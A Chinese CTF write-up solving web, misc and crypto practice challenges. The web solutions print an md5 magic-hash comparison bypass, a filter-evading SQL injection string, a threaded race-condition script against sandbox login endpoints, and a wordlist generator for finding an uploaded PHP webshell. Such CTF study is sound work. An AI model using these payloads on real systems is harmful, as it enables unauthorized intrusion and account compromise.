2017赛客夏令营WP

全是儿题就是

WEB

random

随机数,然后呃,预判

1-100挨个提交都行,懒得抓包了,直接拿了

weakphp

开局一个页面,没有任何提示,找了半天是git泄露,彳亍

工具直接拿,获得php源码

<?php
require_once "flag.php";
if (!isset($_GET['user']) && !isset($_GET['pass'])) {
    header("Location: index.php?user=1&pass=2");
}

$user = $_GET['user'];
$pass = $_GET['pass'];
if ((md5($user) == md5($pass)) and ($user != $pass)){
    echo $flag;
} else {
    echo "nonono!";
}
?>

让这俩md5相等且本身不相等,俩等号直接绕过就行,老套路了

payload:

user=240610708&pass=s878926199a

Checkin

上来一个空白页,彳亍,直接F12看协议,拿flag

base64直接解码

injection

注入题,sqlmap一把梭

Fast running

开局一个密码登录,修改密码后登录也是密码错误

结合题目大概率猜到这玩意怕不是他自动修改密码

那我只能搞脚本梭了

import requests
import threading

s = requests.session()


class MyThread(threading.Thread):
    def __init__(self, item):
        threading.Thread.__init__(self)
        self.item = item

    def run(self):
        main(self.item)


def main(args):
    if args == 1:
        while True:
            ur11 = 'http://challenge-bb30f7382281070d.sandbox.ctfhub.com:10080/change_passwd.php?passwd=123456&passwd_confirm=123456'
            c = s.get(ur11).content
    else:
        while True:
            url2 = 'http://challenge-bb30f7382281070d.sandbox.ctfhub.com:10080/login_check.php?passwd=123456'
            # c11 = s.get(url2, data={' passwd': 111}).content
            c1 = s.get(url2)
            print(c1.text)


if __name__ == '__main__':
    t1 = MyThread(1)
    t2 = MyThread(2)
    t1.start()
    t2.start()

直接出了

injectionV2.0

一般注入题,实际上把请求复制到sqlmap还是可以一把梭

一直梭没意思了,构筑吧

这玩意屏蔽了括号空格之类的东西

构造闭合就行了

user=aadmin’/**/union/**/select/**/1/**/or/**/’1’=’1&pass=1

一般

Uploadddd

一个上传页面,扫描一句话后不知道上传到哪了,

大概率有源码泄露,扫了亿播发现有.index.php.swp存在

先用vim还原一下把

<?php
if (isset($_POST['submit'])){
    $file_path = "uploads/";
    $file_name = date("YmdHis") . rand(0,999) . ".php";
    move_uploaded_file($_FILES["file"]["tmp_name"], $file_path . $file_name);
    echo "上传成功!";
}

?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Web03</title>
</head>
<body>
    <form action="index.php" method="post" enctype="multipart/form-data">
        <input type="file" name='file'>
        <input type="submit" name="submit" value="上传" />
    </form>
</body>
</html>

一般路过代码,进行审计

发现将文件以时间为命名,后面加上0-999的随机数结尾加上.php,最后上传至uploads目录

那只能直接抓包搞了

推测文件名为2020819040734xxx.php

生成词典,直接爆破

time = '20200819040734' #时间
n = ''
for i in range(1000):
	n += time+str(i)+'.php'
	n += '\n'
	print (time+str(i)+'.php')
filename = 'dir.txt'
with open(filename,'a',encoding='utf-8') as f:
    for i in n:
        f.writelines(i)

直接拿到连后门拿shell

MISC

我抓到你了

流量分析,http协议直接导出

1(2).php打不开,看hex值是pk开头,重命名.zip

一个伪协议,直接拿了

简单隐写

一个图片

winhex看编码,结尾处加密

我直接解密

依次base64,base32,base16

拿到flag

机密信息&隐写2.0

这俩题莫名其妙的一模一样,怪

开局一个图片,binwalk直接一把梭

获得压缩包,进行爆破,获得文本

缩放后可以看出是一个二维码,丢进ps稍微修一下

直接扫描拿flag即可

flag{a365b025fa3c58bab9af68e3da850460}

CRYPTO

神秘文件

一般密码题目

给了源码

#!/usr/bin/env python
# coding:utf-8
import base64

def encrypto(string):
    str1 = ""
    for i in string:
        str1 += chr((ord(i) + 8) ^ 0x16)
    str2 = ""
    for j in base64.b16encode(str1):
        str2 += chr(ord(j) ^ 0x32)
    str3 = ""
    for k in base64.b32encode(str2):
        str3 += chr(ord(k) ^ 0x64)
    return base64.b64encode(str3)

def decrypty(string):
    # decrypto code .....
    pass

def main():
    string = "123456"
    encrypto_str = "JTEiJS0lJSIrNSc1Myc9LCUyPjUlUCUiKyUlLCsmKDAlMlYlL1ElIiYtJSwnJSA1JVAnNS9QLSUrJSUsJSYoMSUmVyUlUTUlJiklJTMmKDMlJlclJVA9JSslJSwnJj0hJSZXJS9RJSUrJSUsLSY9ISUmPTUrJiUoJSFZWVlZWVk="
    print encrypto(string)
    print decrypty(encrypto_str)

if __name__ == "__main__":
    main()

嗯,看得出来三次加密,最后输出base64

简单了,在写反向解密就行了,直接贴脚本

#!/usr/bin/env python
# coding:utf-8
import base64

def encrypto(string):
    
    str1 = ""
    for i in string:
        str1 += chr((ord(i) + 8) ^ 0x16)
        
    str2 = ""
    for j in base64.b16encode(str1):
        str2 += chr(ord(j) ^ 0x32)
        
    str3 = ""
    for k in base64.b32encode(str2):
        str3 += chr(ord(k) ^ 0x64)
        
    return base64.b64encode(str3)




def decrypty(string):
    str3 = base64.b64decode(string)
    
    str2 = ""
    for k in str3:
        str2 += chr(ord(k)^0x64)
    
    str2 = base64.b32decode(str2)
    
    str1 = ""
    for j in str2:
        str1 += chr(ord(j) ^ 0x32)
    
    str1 = base64.b16decode(str1)
    
    str0 = ""
    for i in str1:
        str0 += chr((ord(i)^ 0x16 ) - 8)
    
    return str0

    # decrypto code .....
    
    
    
    pass

def main():

    encrypto_str = "JTEiJS0lJSIrNSc1Myc9LCUyPjUlUCUiKyUlLCsmKDAlMlYlL1ElIiYtJSwnJSA1JVAnNS9QLSUrJSUsJSYoMSUmVyUlUTUlJiklJTMmKDMlJlclJVA9JSslJSwnJj0hJSZXJS9RJSUrJSUsLSY9ISUmPTUrJiUoJSFZWVlZWVk="

    print decrypty(encrypto_str)

if __name__ == "__main__":
    main()

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发